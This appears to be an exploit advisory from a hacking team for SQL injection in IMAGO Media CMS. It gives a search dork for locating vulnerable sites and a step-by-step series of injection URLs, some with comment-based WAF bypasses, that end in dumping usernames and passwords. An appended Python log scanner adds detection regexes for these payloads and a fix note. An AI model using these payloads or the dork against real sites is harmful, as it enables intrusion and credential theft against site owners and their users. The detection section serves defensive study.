IMAGO Media CMS SQL Injection

    
+ IMAGO MEDIA CMS SQL INJECTION +
-------------------------------------------

// Author : Zbyte
// Team : K33P-S1L3NT
// Notif : Ternate Lab Pentesting
// page : https://www.facebook.com/loading.gov
// channel : https://www.youtube.com/channel/UChFMZ01R8Z1mhh2tWc-BddQ
// Greets : QueenAisyah | geek_Defcon | kazutto_kun | s1puT | Badaki | 1!0N7!N | i.am_geek | Admiral | Kopral
// CMS : http://imagomedia.co.id/
// DORK : inurl:/hal-visi-misi ext:html
// Admin page : site.com/user/index.php or site.com/admin/

// Special : Overload Team | Cyber Team Cirebon | Mr.Trouble5hooting
// Demo : http://imagomedia.co.id/notif.php


For a description of the WAF bypass used in the Proof of Concept, see:
( https://ghostbin.com/paste/tx2rg )


Proof of Concept
--------------------

site.com/hal-visi-misi.html <= default

site.com/hal-visi-misi'.html

site.com/hal-visi-misi' order by 10+--+.html

site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,9,10+--+.html

site.com/hal-visi-misi' /*!union*/+/*!select*/+1,2,3,4,5,6,7,8,9,10+--+.html

site.com/hal-visi-misi' /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html

site.com/hal-visi-misi' and false /*!12345union*/+/*12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html

site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html <=

site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,version(),10+--+.html

site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,database(),10+--+.html

site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,group_concat(/*!table_name*/),10+from+information_schema./*!tables*/ where /*!table_schema*/=database()+--+.html

site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,group_concat(/*!column_name*/),10+from information_schema./*!columns*/ where /*!table_name*/=0x7461626c656d616e6573+--+.html

site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,pswd,0x3a,status),10+from+tablemanes+--+.html


Source @ Ternate Lab Pentesting
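
Detection note (an added example, not part of the original advisory): the requests in the Proof of Concept leave a recognisable trail in web-server access logs once URL encoding and MySQL comment wrappers are undone. The sketch below normalises each request target and applies a few heuristics; the rule names, the combined log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of /*!...*/ and /*!NNNNN...*/ comments but ignores plain
# /*...*/ comments, so unwrap the first kind and drop the second before matching.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN = re.compile(r"/\*.*?\*/", re.S)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

RULES = [  # rule names are this example's own labels
    ("single-quote", re.compile(r"'")),
    ("order-by-probe", re.compile(r"\border by \d+")),
    ("union-select", re.compile(r"\bunion (?:all )?select\b")),
    ("schema-enum", re.compile(r"\binformation_schema\b")),
]

def normalise(text):
    """Decode, unwrap executable comments, collapse whitespace, lowercase."""
    for _ in range(3):  # bounded loop also catches double URL-encoding
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = VERSIONED.sub(r" \1 ", text)
    text = PLAIN.sub(" ", text)
    return re.sub(r"\s+", " ", text).lower()

def classify(target):
    text = normalise(target)
    return [name for name, rx in RULES if rx.search(text)]

def scan(log_lines):
    """Return (request target, matched rules) for every suspicious line."""
    findings = []
    for line in log_lines:
        m = REQUEST.search(line)
        if m and (hits := classify(m.group(1))):
            findings.append((m.group(1), hits))
    return findings

# Constructed access-log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /hal-visi-misi.html HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2024:10:00:07 +0000] "GET /hal-visi-misi%27%20order%20by%2010+--+.html HTTP/1.1" 200 812',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /hal-visi-misi%27%20and%20false%20/*!12345union*/+/*!12345select*/+1,2,3+--+.html HTTP/1.1" 200 5230',
    '203.0.113.5 - - [01/Jan/2024:10:00:12 +0000] "GET /hal-visi-misi%27%20/*!union*/+/*12345select*/+1,2,3+--+.html HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A single quote alone is a weak signal and will also match legitimate input, so treat it as context for the other rules. The underlying fix remains binding the page slug as a query parameter instead of concatenating it into SQL.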
